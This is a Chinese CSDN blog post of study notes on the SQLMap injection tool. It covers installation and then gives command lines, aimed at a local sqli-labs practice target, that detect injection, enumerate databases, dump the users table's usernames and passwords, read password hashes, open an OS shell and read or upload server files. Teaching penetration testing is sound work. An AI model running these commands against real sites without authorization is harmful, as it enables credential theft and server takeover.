常用的渗透测试工具之 SQLMap

已于 2022-11-13 17:16:45 修改
阅读量1.3k 收藏 7
点赞数
分类专栏: web安全攻防学习 文章标签: web安全 网络安全
于 2022-11-13 17:13:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58724126/article/details/127829889
版权

《web安全攻防》第三章学习之SQLmap

SQLMap介绍:

SQLMap是自动化的SQL注入工具,主要功能是扫描,发现并利用URL的SQL注入漏洞,内置了很多绕过插件。SQLMap采用了五种独特的SQL注入技术,如下:

(1)基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
(2)基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。
(3)基于报错注入,即页面会返回错误信息,或者者把注入的语句的结果直接返回到页面中。
(4)联合查询注入,在可以使用Union的情况下的注入。
(5)堆查询注入,可以以同时执行多条语句时的注入。

SQLMap的强大功能包括数据库指纹识别,数据库枚举,数据提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

3.1安装SQLMap

安装SQLmap前需要先安装python2版本的,我安装的是python2.7,在python官网上下载安装即可

python官网:Welcome to Python.org

sqlmap官网:http://sqlmap.org/

 点击下载解压即可。

下载后将整个SQLmap文件夹放在安装python的文件夹下。

 然后配置环境变量:

复制python27和SQLmap文件位置进行配置

接下来打开命令行,输入sqlmap.py出现一下界面,即设置成功 

 3.2 SQLMap入门

(1)拿到一个站点,要判断是否存在注入,假设目标注入点是:http://127.0.0.1/sql/Less-1/?id=1

命令为:sqlmap.py  -u http://127.0.0.1/sql/Less-1/?id=1 --batch

 当注入点后面的参数大于等于两个时,需要加双引号,如下:

命令为:sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=2" --batch

(2)判断文本中的请求是否存在注入

 (3)查询当前用户下的所有数据库

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --dbs

(4)获取数据库中的表名

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security --tables

 

 (5)获取表中的字段名

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users --columns

(6)获取字段内容

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users -C id,username,password --dump

(7)获取数据库的所有用户

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --users

(8)获取数据库用户的密码

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --passwords

 

(9)获取当前数据库的名称

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --current-db --batch

(10)获取当前网站数据库的用户名称

命令行:sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=3" --current-user

 3.3SQLMap进阶:参数讲解

(1)--level5 :探测等级

参数--level 5 指的是需要执行的5个等级,可不加level,默认为1。cookie测试等级为2,HTTPUser-Agent/Referer头在level为3时测试。总之,在不确定那个Payload或参数注入点时,为了保证全面性,建议使用高的level值。

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --level 3

(2)--is-dba:当前用户是否为管理权限

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --is-dba

该命令用于查看当前账户是否为数据库管理账户,是的话返回Ture

(3)--roles:列出数据库管理员角色

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --roles

该命令用于查看数据库用户的角色。如果当前用户有权限读取包含所有用户的表,输入该命令会列举出每个用户的角色,也可以用-U参数指定想看哪个用户的角色。该命令仅适用于当前数据库是Oracle的时候。

(4)--referer: HTTP Referer头

SQLMap可以在请求中伪造HTTP中的referer,当--level参数设定为3及以上时,会尝试对Referer注入。可以使用referer命令来欺骗。

如:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --referer http://www.baidu.com

用这个进行探测的话,会认为探测的页面是从百度过来的,而不是自己本体主机

(5)--sql-shell:运行自定义的SQL语句

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --sql-shell

(6)--os-cmd,--os-shell:运行任意操作系统命令

执行该命令具备的条件:

数据库用户是dba权限;

知道网站的绝对路径;

PHP当中的gpc为off,PHP自动转义为关闭状态;

就算具备上述三个条件,因涉及系统命令,也未必执行成功。

(7)--file-read:从数据库服务器中读取文件

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --file-read "C:/1.txt"

(8)--file-write --file-dest:上传文件到数据库服务器中

命令行:sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --file-write "上传文件路径(相对路径)"--file-dest "目标文件系统绝对路径"

云杉_晴天
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的绕waf脚本名称,方便针对各种过滤手段选择对应的脚本 在许多情况下,防火墙只能防御已知的攻击模式和威胁。然而,SQL注入是一种动态的、高度灵活的攻击方式,防火墙很难对其进行全面的防御。SQLMAP利用这一点,通过构造特定的SQL语句,绕过防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的SQL语句。这些语句在防火墙看来可能是正常的、合法的请求,但实际上却包含了恶意的SQL代码,能够导致数据库泄漏数据、甚至完全被控制。 当然,SQLMAP并不是一种万能的工具。它需要使用者具备一定的技术知识和经验,才能正确地使用并获得最佳效果。尽管如此,SQLMAP无疑是一个强大的工具,它可以帮助你发现那些防火墙可能无法检测到的安全风险。 总结起来,SQLMAP是一种强大的、能够绕过防火墙检测的工具。它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时修复这些漏洞,确保你的数据安全。所以,如果你想确保你的应用程序免受潜在威胁的影响,那么SQLMA
SQLMap 渗透工具详细讲解
ju7ran的博客
05-11 1508
我们在学习 SQLMap 的时候,可以根据官网的介绍来了解 SQLMap 的功能。官网地址:https://sqlmap.org/进入官网,我们可以看到这张图片,类似一个小针头的图标,可能为了表达我是 SQL 注入……根据官网的介绍,我们可以了解到 SQLMap,是一种开源渗透测试工具,它可以自动化检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。
SQL注入工具之SQLmap入门操作
caixiangting的博客
02-19 1144
level=LEVEL //水平1-5,也不是数字越高越精准,但也不是越高越好。越高数据包发送量就越大,被发现的可能也就越大。如果怕把甲方业务搞挂了,也不要开的太大。--risk=RISK //风险1-3,也不是数字越高越精准,但也不是越高越好。越高数据包发送量就越大,被发现的可能也就越大。虽然没有官方的图形化界面,但是市面上有很多个人做的图形化插件,如果实在不熟悉命令行可以考虑换成图形化插件进行使用。:可以从官方网站(https://sqlmap.org/)下载最新版本的SQLmap
渗透工具sqlmap下载安装超详细教程Windows
weixin_56306210的博客
07-20 1万+
渗透工具sqlmap下载安装超详细教程Windows
SQLMap环境搭建
T1ngSh0w的博客
09-09 2357
sqlmap+python3.8.6环境搭建
SQLMAP介绍及使用
qq_53742230的博客
07-06 2593
安全工具SQLMAP的使用
2021年软件测试工具总结——安全测试工具【附官网地址】
测试界的彭于晏的博客
12-28 7782
无论是早期的互联网时代,还是当今移动互联或万物互联时代,软件服务的安全性都至关重要,这也就迫使我们重视安全性测试。安全性测试一般围绕被保护的资产,通过代码和程序的分析来确定威胁或漏洞的严重程度,以及被利用的可能性和影响,来评估特定威胁或漏洞对企业造成负面影响的风险。除了综合的安全性风险评估之外,安全性测试一般有以下几种类型: 漏洞扫描:由工具自动对代码进行静态分析,以识别软件组件中是否存在已知的漏洞。 渗透测试:是在安全条件下模拟黑客对应用程序、软件、系统或网络进行网络攻击的过程。渗透测试可
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 2736
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sqlmap的下载、安装
Haowill的博客
08-11 2833
下载 首先安装python2 进入sqlmap官网:http://sqlmap.org/ windows下载.zip file 下载成功后解压,并且放在python2的目录下(不放在python2目录下,使用时会报错) 安装成功 检测 cmd进入sqlmap所在的目录下 输入:python2 .\sqlmap.py 出现上图说明安装成功 ...
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持以下几种独特的注入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
sqlmap渗透工具
07-06
sqlmap渗透工具,需要python环境,需要相关使用命令可以看我的博客
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程.docx
sqlmap的基本使用
weixin_59246157的博客
04-21 537
注意事项:在使用SQLmap时需要注意不要对未授权的网站进行测试,以免触犯法律。同时也需要注意保护自己的安全,例如在使用“--os-shell”参数时需要谨慎操作,避免对目标服务器造成不必要的损失。1. 下载和安装:可以从SQLmap官网(https://sqlmap.org/)下载最新版的压缩包,解压后即可使用。6. 其他参数:SQLmap还支持其他参数,例如:设置请求头、设置cookie、设置代理、设置扫描等级等等。可以使用“-h”参数查看所有可用的参数。
SQLmap下载和安装教程(详细附图)
热门推荐
weixin_44023403的博客
01-13 1万+
SQLmap下载和安装教程一、准备:1、下载安装python二、下载安装sqlmap 一、准备: python2.X(要是python2) SQLmap python下载地址:https://www.python.org/downloads/ SQLMap下载: http://sqlmap.org/ 1、下载安装python 根据自己电脑系统,选择下载版本,以64bit,Win10为例; 这里下载有点儿慢,可以复制下载链接,用迅雷下载; 双击安装; 将“Add python.exe to Path”
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1586
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
注入神器-sqlmap
weixin_34384915的博客
11-17 175
此文章写的不错:http://pnig0s1992.blog.51cto.com/393390/402775 推荐sqlmap 官网:http://sqlmap.org/https://github.com/sqlmapproject/sqlmap/zipball/mastersqlmap 的运行需要python环境。直接到官网下载安装即可。下载 2.7.8 版本,链接如下:...
渗透测试工具sqlmap基础教程
Y525698136的博客
06-15 341
对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。
数据库渗透测试SQLMAP适用
06-08
SQLMAP是一个自动化的数据库渗透测试工具,主要是用于检测和利用Web应用程序中的SQL注入漏洞。它可以自动探测目标网站是否存在SQL注入漏洞,然后利用这些漏洞获取目标数据库的敏感数据。因此,SQLMAP非常适用于数据库渗透测试。不过,在实际使用中,需要注意合法性问题,遵守法律法规,不得进行非法操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值